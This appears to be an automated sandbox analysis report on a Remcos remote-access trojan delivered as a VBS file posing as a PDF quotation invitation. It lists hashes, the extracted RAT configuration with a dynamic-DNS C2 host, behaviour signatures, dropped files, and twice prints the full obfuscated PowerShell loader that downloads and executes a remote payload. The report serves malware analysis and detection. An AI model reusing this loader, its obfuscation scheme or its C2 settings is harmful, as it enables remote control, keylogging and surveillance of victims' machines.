Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    01-10-2024 00:10

General

  • Target

    Invitation to Quotation_ Supply (2024 - 2026)_Final·pdf.vbs

  • Size

    70KB

  • MD5

    026c99ced565e7485d27c67d665e2174

  • SHA1

    25658aa6d57665a8c685c468627a61407a087702

  • SHA256

    60eae7b4f1e61d93ca69cad7b0926d434a61033a2fb4e8b0eb013a611c9a5f00

  • SHA512

    533326f7c7759a8fea84eff1b4d7e9953a573443b988329c4c91a170958578be5d36fe26974d77784f0388409be3b059646d63f49dfa7c15d2b07719e6aac6ed

  • SSDEEP

    1536:siTM6WBtreAg6z+oLNVRL+Cr3t1yLQWm2jdC39x/f:siTzFApzvKCriQr7f

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • delete_file

    false

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-WDQFG0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invitation to Quotation_ Supply (2024 - 2026)_Final·pdf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2316
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#valdemarsdag Almuemblets Orton Bedsick Skvttene Beklagede Brandloves #>;$Renssanceslottenes='annisette';<#Tectites Kloroformering Hvser Finesses #>;$Hypsometrically=$host.PrivateData;If ($Hypsometrically) {$Outdoor++;}function Alcades($Villaers){$Penalist206=$Thyraden+$Villaers.Length-$Outdoor;for( $Typegodkendelsernes=5;$Typegodkendelsernes -lt $Penalist206;$Typegodkendelsernes+=6){$Disponeringen='Disputatsernes';$Folkefrontsregeringerne+=$Villaers[$Typegodkendelsernes];}$Folkefrontsregeringerne;}function Bapt($Befalende){ & ($Encyklopdierne74) ($Befalende);}$eftersprgsel=Alcades 'MangrMDemagoSpor zrepariKrok.lTidtalSo pnaEruct/.nthr5 Pale.Amnes0Drmnd Gstep(AmorbWBismeiHjtidnMatchdMelamoSidelwDisemsDitma ProtoN ForsTPirar Guss1Te mo0 yper.Vel.t0Enkel;Picro focomW ShopiOdyssn.onin6G.oph4Samme;affr, fugiox,utor6bonde4Sukiy;Remin UddarEkstrvElimi:.kokr1Croup2.trid1 .ill.Ny ri0Hemid)Ker e ejlfGBestae PharcGioc kReadyo nive/C clo2solin0Fremt1Sperm0Efter0 Supe1St nt0Cheap1Blokk ,ygiFA.thriDecenrImp re SelvfMindsoMarraxInder/ mull1Chanc2Re yl1Ugenn.Simpl0O,skr ';$Videnskabens=Alcades ' ReviU,nthrsTrolde UdenRBene,- RandaPatosgfor.oEGodmonreturTBe ig ';$Systemkonsulenten=Alcades 'Circuh ukltUpteatMeantpWienesS nkr:minim/Sy va/ Fr idSendarRebeniProtovindhee Ita .S kevg S neo.someo Talog Hydrl ,osteTeske. UtvecNedsioSolismObsku/IllisuBacilcsi em? Um.neBaldrxBryllpUntrioInd krB.tentNaade= MingdFiguroT netwNat,onP ssel Afsto Sikla En,od ,lyd& ClutiAventdtermi= besk1F lkeO Skr,1blgemm Fa ewAfskyXBarmeUAktieFin.gafSkalaXIbr ga RessBoverdVVejvid Par FGen yO TormNhandesJ,bbitShake6 ,mmerFrd,gtFiskeCSkg aasttteiFremsECotseqSuccerCoact1 SvinDPakniBSid hM ClerzO end ';$Asylcenteret=Alcades 'Uopmr>Ettie ';$Encyklopdierne74=Alcades ' Fossi.ernaeVlg,nX Wi s ';$Belurede='Billedstilen';$Grippingness='\Hankul.lre';Bapt (Alcades ' Porn$,rsengReexplHesteoCollibNontea Monolproje:IntreUAnlgsn,argerR,prse H lpa Uhjes MenuoudrednForldaSkovkbTraadlT lsiyNo ze=ambi,$FaglreCog,an,aritvGenre: chilaSovehp LhunpDis,ndCoindaDelfut Psama Neon+Forfe$ FaheGDemobrVimpliLiverp LovfpAnm siAttranT rgig PoetnBl gle WillsSaahfs erce ');Bapt (Alcades 'e sil$GaleogSele,l,ndkroSamecb aasa ,enslTrans:MderoD OvereAc sccskruerMansto AvliwP eornG nreiUgthen Bir,gForbu=Monks$ EpilSSalamySedessKindttFernielvsp m Mirdk gtteoPreinnSnab sTiteluFav.ulCampheStiklnBaro t EtheeS kelnrestg.Ka tnsPlenipKechelHer aiKansatSigne(Plysh$ TictA SpansTjekkyPhanelLegercReinfePlakanSinoltUncoseAffi rAn,iveEpitetnaper)Jeral ');Bapt (Alcades 'Herb [ kriNIndreePiplet Egoc.BjrgeSE.noseProd.rFra rvInhari A arcComane InvePSee.noAarhuiInddan .osttSuperM A.toaGrabbnGlypha Udbog acheP therCha.i]Stra :Daimo:T.luiSPsiloe Im,uc BrimuPal orNgleaiTranstHy teyFor dPPa fur.erkoo MacetIn uroDeponcLageroTetralCockp asmo=Cha.m un is[hakk.N SmreeUnbiot Unde.FreudSmi.dre Tr pcDriftu liprTilloiMeatitLandgysarc PMiscrrTra uoHornstBi taoSprtnc grunoDoedslHleriTOratoyingerpindokeAfsyr]Styrm:Vagtf: SansTC ntrlBerejsArbej1Ad or2 cirr ');$Systemkonsulenten=$Decrowning[0];$Belligerent=(Alcades ' Difd$Ule lGTypecL rusOV ndibbrandA Vi.eL B,og:Nonprt AmarATransF ResufWher EFusioLnonciA DedoNPot oDReceneAfgrdNEnganSSalva=,arciNAdel,ERumaeW Jord- GiveoSuffoBBrasejJagtgeUgeblCu bratPylor Sunr sS perY oversOpforTImproESunbeM Mese.RerevnSvbereCat.gt oggi. hermwWarbleInt.rbS jltcRibieLTyndsI Clote irekn ackiTFlo,s ');Bapt ($Belligerent);Bapt (Alcades 'adven$HvassT Forea FlerfendopfAd,eneGalvalSlibeaBrav nStopkdS,atieWindon thecsDisty.Hj peHS.irre C,inaT.pamd AendeSuretrBruttsS gfr[ kurd$Ca seV B pti,ustodSkrfeeS onsnTricksDisksk Nec,a ChoobSikste S benSkrums.nfol]Unmet= ilsy$n veleFrontfIndlstEpicaeTrafir Varis chrepH vedrHarmogCondusR indeSizedl Bort ');$Everternes111=Alcades ' yubi$PolluTBanneaCa nifMass fBen,ieDextrlWill.aPolitn BaksdNonsteBr chnanmelsBando.F emlDYtretoJegrowEfeuensli,klF rtaoPharmaBeskrddi,opFStokeiak ielN.nble Su d(Chei $OverfSKnudeycoralsH,pert Hi.heTransm.inskkVedtgoSvvnin DdmasFestruPersolBhutaeGyritnAcusht lbe eDo.umn lade,Unrap$SkarrFSalmioKredioDresst,alish rskaspr.sl OblitExti,)devis ';$Foothalt=$Unreasonably;Bapt (Alcades 'Diqua$Omp,ag PredL artOPedalbSpildACaterLEcort:Tip.kpTrud aSacrar ZeroaSpiseS hastU Sejlc ReneHPa chI EnmiaGueriN Coas= Eart( HalfTMaaneeLineaSEk poT A.ic-StackPPrammASpiset OmklH Over Gabon$Irre.fTyresOAgnetoMarmoThistohManifA Fo,elPaafyTT ddy) Remi ');while (!$parasuchian) {Bapt (Alcades 'Mi,be$ t,eogPhotolBrasho Precb.essia SurrlPrint: N.ntg UncorApotenTilbatSampatS ccirf emmrOverseF gedsAr int JouraprovitridiniBeskjoLegionsalto=Fyrbd$ TuritSylterCulttuFattee Jain ') ;Bapt $Everternes111;Bapt (Alcades 'StrutS odsvtSam,ea Fluor n,cltDkner-Tipp Snon ul SylteKridte.istipLenap Suger4Straf ');Bapt (Alcades 'Spect$GuaiagHairblHvlbno ellkb SvedaSuperlUnico:DataipKniplaHvdinrDriveasteresTreoguIssuicAcraehCupoliCikoraN chin Limb=Skoma( TyveT LokaeCorinsInvolt Indu-Ravn PPe,alaChurntBis nh ,ygn Kno l$ HypeFBalteo hetroVejsytIrrefhCompuaDegenlRe est rie)Ped g ') ;Bapt (Alcades 'phlo.$ inerg anhelChi.oo IsodbNyrupaDiethlOp ol:FarmoSrune.oAstrunP ttyd TiterUdligeMindedNdsageKeftisTr ch= Sher$SipaggDejlilsemico rgonbStavea pilflValut:CirklB Dun.eIsoditSlibraIm rokU,flokStrygeFo,udnUncomdServieAb nnsUnl m+Uigen+Heter%Mawki$ Ti kDBureleTrivicDe arrStuehoBortcw betjn ,viniDo trn PaadgLbeba.He hfcTjensoRkeheuSke tnBegyntUnhau ') ;$Systemkonsulenten=$Decrowning[$Sondredes];}$Hjaelpefunktioner=307869;$Verminiferous=33650;Bapt (Alcades ' Dreg$Genskgskiv l.ymnao etvrbLasquaSubcolUdk.b: ,xseC RtebuFkalilImmeatB omkiUdplus amb,tHjemlsFdeli Jungl=Embry TrmaGDehuseBowldtDilet-Par oCBevaro PerinBr snt SkrieFr skn Su ftRelad Indgi$Dem uF,illeoeuritoT,tart Ve.thUnenvaStorelO.trut Bade ');Bapt (Alcades 'Preli$SarcogBeha lLucifoUngdobKlandaCornflRoist:ExoarE rmatn Fldeg optalTritteDobbelskimli.cevogPanda essa= Trai Parl[Indu.SP eryy.ultisSkbnetNonpeeFaxetmSi,na.blomrCUstudoMidranT,ustvNed geStaverB kentDipod] ,and: H ns:,opguFPlantrMicroo repom anyBP,einaTaknesL ereeBardu6Per,g4Sph gS,ftvtt Bowlr VinliS ardnIndfogU spe(,agen$TraadCSireduAtophltilv tTentui NonssDumpct.nrklsDesin)dagsp ');Bapt (Alcades ' Butt$IndsngAventl Ind oDorsobBlabbaEpi,lld,skr:Pall Lpse,dyToppusCompusGazettO erwoUnadvf Ph gr Car rPicofeK nomtFir osRingi aade=Circu Mi k[ DisaSJ.rdryIron.sArki.tStoveeFavnfmSak e.SkraaTIncaneD.chox roktEquip.ManitESvippn Micrc rdioBrugedBib liStaa nMarkegBestn]brann: Tjen:CembaANigh SJo.isC ositI Rd uIUninv.NoncoGStandesyl btWr,ckSBethotBindor Mu iiOmrednCartogDetai( .all$,habdEOnc gnCrat,gRuddel KitceFremklProduiBanangS,mie)n.rdl ');Bapt (Alcades 'Klude$B bisgEcleclLi psoSn vebSanhiaIntenlReuph: De tVArkadl oldgHormoeHyp orKo,resSkriv=Gbth $StjerLBortryNettos .ribs,ntictAviaroBarnefId lirE chsrDre geVo.tetUang s Imag.unsorsSac.fu Mns.b Hjl,s edit ParorRtstoiSymbinAsin gOders(Rhync$Flag H ElevjSky eaalma.eBrod lKildepMingueBill fPhospu AcetnMervrkOu,potUdviki CetaoP usknElsk.ePay ar When,In,er$Udgi V B iseNone rRivejmTjresiS ytinAnal i Re rfMouseeMeda.rDief oEndevuTribrsMod t)Satte ');Bapt $Vlgers;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2808
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#valdemarsdag Almuemblets Orton Bedsick Skvttene Beklagede Brandloves #>;$Renssanceslottenes='annisette';<#Tectites Kloroformering Hvser Finesses #>;$Hypsometrically=$host.PrivateData;If ($Hypsometrically) {$Outdoor++;}function Alcades($Villaers){$Penalist206=$Thyraden+$Villaers.Length-$Outdoor;for( $Typegodkendelsernes=5;$Typegodkendelsernes -lt $Penalist206;$Typegodkendelsernes+=6){$Disponeringen='Disputatsernes';$Folkefrontsregeringerne+=$Villaers[$Typegodkendelsernes];}$Folkefrontsregeringerne;}function Bapt($Befalende){ & ($Encyklopdierne74) ($Befalende);}$eftersprgsel=Alcades 'MangrMDemagoSpor zrepariKrok.lTidtalSo pnaEruct/.nthr5 Pale.Amnes0Drmnd Gstep(AmorbWBismeiHjtidnMatchdMelamoSidelwDisemsDitma ProtoN ForsTPirar Guss1Te mo0 yper.Vel.t0Enkel;Picro focomW ShopiOdyssn.onin6G.oph4Samme;affr, fugiox,utor6bonde4Sukiy;Remin UddarEkstrvElimi:.kokr1Croup2.trid1 .ill.Ny ri0Hemid)Ker e ejlfGBestae PharcGioc kReadyo nive/C clo2solin0Fremt1Sperm0Efter0 Supe1St nt0Cheap1Blokk ,ygiFA.thriDecenrImp re SelvfMindsoMarraxInder/ mull1Chanc2Re yl1Ugenn.Simpl0O,skr ';$Videnskabens=Alcades ' ReviU,nthrsTrolde UdenRBene,- RandaPatosgfor.oEGodmonreturTBe ig ';$Systemkonsulenten=Alcades 'Circuh ukltUpteatMeantpWienesS nkr:minim/Sy va/ Fr idSendarRebeniProtovindhee Ita .S kevg S neo.someo Talog Hydrl ,osteTeske. UtvecNedsioSolismObsku/IllisuBacilcsi em? Um.neBaldrxBryllpUntrioInd krB.tentNaade= MingdFiguroT netwNat,onP ssel Afsto Sikla En,od ,lyd& ClutiAventdtermi= besk1F lkeO Skr,1blgemm Fa ewAfskyXBarmeUAktieFin.gafSkalaXIbr ga RessBoverdVVejvid Par FGen yO TormNhandesJ,bbitShake6 ,mmerFrd,gtFiskeCSkg aasttteiFremsECotseqSuccerCoact1 SvinDPakniBSid hM ClerzO end ';$Asylcenteret=Alcades 'Uopmr>Ettie ';$Encyklopdierne74=Alcades ' Fossi.ernaeVlg,nX Wi s ';$Belurede='Billedstilen';$Grippingness='\Hankul.lre';Bapt (Alcades ' Porn$,rsengReexplHesteoCollibNontea Monolproje:IntreUAnlgsn,argerR,prse H lpa Uhjes MenuoudrednForldaSkovkbTraadlT lsiyNo ze=ambi,$FaglreCog,an,aritvGenre: chilaSovehp LhunpDis,ndCoindaDelfut Psama Neon+Forfe$ FaheGDemobrVimpliLiverp LovfpAnm siAttranT rgig PoetnBl gle WillsSaahfs erce ');Bapt (Alcades 'e sil$GaleogSele,l,ndkroSamecb aasa ,enslTrans:MderoD OvereAc sccskruerMansto AvliwP eornG nreiUgthen Bir,gForbu=Monks$ EpilSSalamySedessKindttFernielvsp m Mirdk gtteoPreinnSnab sTiteluFav.ulCampheStiklnBaro t EtheeS kelnrestg.Ka tnsPlenipKechelHer aiKansatSigne(Plysh$ TictA SpansTjekkyPhanelLegercReinfePlakanSinoltUncoseAffi rAn,iveEpitetnaper)Jeral ');Bapt (Alcades 'Herb [ kriNIndreePiplet Egoc.BjrgeSE.noseProd.rFra rvInhari A arcComane InvePSee.noAarhuiInddan .osttSuperM A.toaGrabbnGlypha Udbog acheP therCha.i]Stra :Daimo:T.luiSPsiloe Im,uc BrimuPal orNgleaiTranstHy teyFor dPPa fur.erkoo MacetIn uroDeponcLageroTetralCockp asmo=Cha.m un is[hakk.N SmreeUnbiot Unde.FreudSmi.dre Tr pcDriftu liprTilloiMeatitLandgysarc PMiscrrTra uoHornstBi taoSprtnc grunoDoedslHleriTOratoyingerpindokeAfsyr]Styrm:Vagtf: SansTC ntrlBerejsArbej1Ad or2 cirr ');$Systemkonsulenten=$Decrowning[0];$Belligerent=(Alcades ' Difd$Ule lGTypecL rusOV ndibbrandA Vi.eL B,og:Nonprt AmarATransF ResufWher EFusioLnonciA DedoNPot oDReceneAfgrdNEnganSSalva=,arciNAdel,ERumaeW Jord- GiveoSuffoBBrasejJagtgeUgeblCu bratPylor Sunr sS perY oversOpforTImproESunbeM Mese.RerevnSvbereCat.gt oggi. hermwWarbleInt.rbS jltcRibieLTyndsI Clote irekn ackiTFlo,s ');Bapt ($Belligerent);Bapt (Alcades 'adven$HvassT Forea FlerfendopfAd,eneGalvalSlibeaBrav nStopkdS,atieWindon thecsDisty.Hj peHS.irre C,inaT.pamd AendeSuretrBruttsS gfr[ kurd$Ca seV B pti,ustodSkrfeeS onsnTricksDisksk Nec,a ChoobSikste S benSkrums.nfol]Unmet= ilsy$n veleFrontfIndlstEpicaeTrafir Varis chrepH vedrHarmogCondusR indeSizedl Bort ');$Everternes111=Alcades ' yubi$PolluTBanneaCa nifMass fBen,ieDextrlWill.aPolitn BaksdNonsteBr chnanmelsBando.F emlDYtretoJegrowEfeuensli,klF rtaoPharmaBeskrddi,opFStokeiak ielN.nble Su d(Chei $OverfSKnudeycoralsH,pert Hi.heTransm.inskkVedtgoSvvnin DdmasFestruPersolBhutaeGyritnAcusht lbe eDo.umn lade,Unrap$SkarrFSalmioKredioDresst,alish rskaspr.sl OblitExti,)devis ';$Foothalt=$Unreasonably;Bapt (Alcades 'Diqua$Omp,ag PredL artOPedalbSpildACaterLEcort:Tip.kpTrud aSacrar ZeroaSpiseS hastU Sejlc ReneHPa chI EnmiaGueriN Coas= Eart( HalfTMaaneeLineaSEk poT A.ic-StackPPrammASpiset OmklH Over Gabon$Irre.fTyresOAgnetoMarmoThistohManifA Fo,elPaafyTT ddy) Remi ');while (!$parasuchian) {Bapt (Alcades 'Mi,be$ t,eogPhotolBrasho Precb.essia SurrlPrint: N.ntg UncorApotenTilbatSampatS ccirf emmrOverseF gedsAr int JouraprovitridiniBeskjoLegionsalto=Fyrbd$ TuritSylterCulttuFattee Jain ') ;Bapt $Everternes111;Bapt (Alcades 'StrutS odsvtSam,ea Fluor n,cltDkner-Tipp Snon ul SylteKridte.istipLenap Suger4Straf ');Bapt (Alcades 'Spect$GuaiagHairblHvlbno ellkb SvedaSuperlUnico:DataipKniplaHvdinrDriveasteresTreoguIssuicAcraehCupoliCikoraN chin Limb=Skoma( TyveT LokaeCorinsInvolt Indu-Ravn PPe,alaChurntBis nh ,ygn Kno l$ HypeFBalteo hetroVejsytIrrefhCompuaDegenlRe est rie)Ped g ') ;Bapt (Alcades 'phlo.$ inerg anhelChi.oo IsodbNyrupaDiethlOp ol:FarmoSrune.oAstrunP ttyd TiterUdligeMindedNdsageKeftisTr ch= Sher$SipaggDejlilsemico rgonbStavea pilflValut:CirklB Dun.eIsoditSlibraIm rokU,flokStrygeFo,udnUncomdServieAb nnsUnl m+Uigen+Heter%Mawki$ Ti kDBureleTrivicDe arrStuehoBortcw betjn ,viniDo trn PaadgLbeba.He hfcTjensoRkeheuSke tnBegyntUnhau ') ;$Systemkonsulenten=$Decrowning[$Sondredes];}$Hjaelpefunktioner=307869;$Verminiferous=33650;Bapt (Alcades ' Dreg$Genskgskiv l.ymnao etvrbLasquaSubcolUdk.b: ,xseC RtebuFkalilImmeatB omkiUdplus amb,tHjemlsFdeli Jungl=Embry TrmaGDehuseBowldtDilet-Par oCBevaro PerinBr snt SkrieFr skn Su ftRelad Indgi$Dem uF,illeoeuritoT,tart Ve.thUnenvaStorelO.trut Bade ');Bapt (Alcades 'Preli$SarcogBeha lLucifoUngdobKlandaCornflRoist:ExoarE rmatn Fldeg optalTritteDobbelskimli.cevogPanda essa= Trai Parl[Indu.SP eryy.ultisSkbnetNonpeeFaxetmSi,na.blomrCUstudoMidranT,ustvNed geStaverB kentDipod] ,and: H ns:,opguFPlantrMicroo repom anyBP,einaTaknesL ereeBardu6Per,g4Sph gS,ftvtt Bowlr VinliS ardnIndfogU spe(,agen$TraadCSireduAtophltilv tTentui NonssDumpct.nrklsDesin)dagsp ');Bapt (Alcades ' Butt$IndsngAventl Ind oDorsobBlabbaEpi,lld,skr:Pall Lpse,dyToppusCompusGazettO erwoUnadvf Ph gr Car rPicofeK nomtFir osRingi aade=Circu Mi k[ DisaSJ.rdryIron.sArki.tStoveeFavnfmSak e.SkraaTIncaneD.chox roktEquip.ManitESvippn Micrc rdioBrugedBib liStaa nMarkegBestn]brann: Tjen:CembaANigh SJo.isC ositI Rd uIUninv.NoncoGStandesyl btWr,ckSBethotBindor Mu iiOmrednCartogDetai( .all$,habdEOnc gnCrat,gRuddel KitceFremklProduiBanangS,mie)n.rdl ');Bapt (Alcades 'Klude$B bisgEcleclLi psoSn vebSanhiaIntenlReuph: De tVArkadl oldgHormoeHyp orKo,resSkriv=Gbth $StjerLBortryNettos .ribs,ntictAviaroBarnefId lirE chsrDre geVo.tetUang s Imag.unsorsSac.fu Mns.b Hjl,s edit ParorRtstoiSymbinAsin gOders(Rhync$Flag H ElevjSky eaalma.eBrod lKildepMingueBill fPhospu AcetnMervrkOu,potUdviki CetaoP usknElsk.ePay ar When,In,er$Udgi V B iseNone rRivejmTjresiS ytinAnal i Re rfMouseeMeda.rDief oEndevuTribrsMod t)Satte ');Bapt $Vlgers;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2640
    • C:\Windows\syswow64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      PID:3036

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    144B

    MD5

    9667a54b1067e94f076828cedc780fa9

    SHA1

    bd8eb96f4642750fa555d4a6fde33b7c87af4f8b

    SHA256

    77e3487849fb4a23f8e75fec23c9e95fd74f3e6462bbf2489d910539d0753d58

    SHA512

    85400444449ffb4d30c4d9a48a2a01692e836d120176c603ed2b35ad274a1138a736b3c0297ec548d10d6d1c369819e79246792b1adb9d21b758c522da668c40

  • C:\Users\Admin\AppData\Roaming\Hankul.lre

    Filesize

    444KB

    MD5

    df0cdb0c74f058f16e57727c4cf4456d

    SHA1

    6a309c569491c61207cf74daa0a5a71e50fe3abe

    SHA256

    98eaa4788b0eec18c72b592bceb9b71d7225aebb6e8d9cb1718eaa842fcd004c

    SHA512

    82e551c6d3505619b69e9d13d63b1d82c2738460bbc1b900fe4a43594d36632c8920189c31a0635d8860621151c1a44fa31b24ce02ee6bd4635b695d4d03a756

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L3XX4EY86TJO1X3GTXLE.temp

    Filesize

    7KB

    MD5

    d46f26ecb1a58cc105461344cbd3d04f

    SHA1

    6f5844f28cc53865a0dc662c74070852aa35a4f6

    SHA256

    197432935ef0031681240ab620efbc3d2339cdd80d92e5311f103a78d53fb62e

    SHA512

    3e912ec20050b9e758eff6b7a84e29509c2cd4685f600b9c0a6d45f8c9e4023d114fd761c62b4b08027604413d9c6016e667dd30a32e02d9ee31300c6abe23dc

  • memory/2640-16-0x00000000065E0000-0x000000000976D000-memory.dmp

    Filesize

    49.6MB

  • memory/2808-4-0x000007FEF560E000-0x000007FEF560F000-memory.dmp

    Filesize

    4KB

  • memory/2808-5-0x000000001B840000-0x000000001BB22000-memory.dmp

    Filesize

    2.9MB

  • memory/2808-6-0x0000000001C90000-0x0000000001C98000-memory.dmp

    Filesize

    32KB

  • memory/2808-7-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp

    Filesize

    9.6MB

  • memory/2808-8-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp

    Filesize

    9.6MB

  • memory/2808-9-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp

    Filesize

    9.6MB

  • memory/2808-12-0x000007FEF5350000-0x000007FEF5CED000-memory.dmp

    Filesize

    9.6MB

  • memory/3036-38-0x0000000000330000-0x0000000001392000-memory.dmp

    Filesize

    16.4MB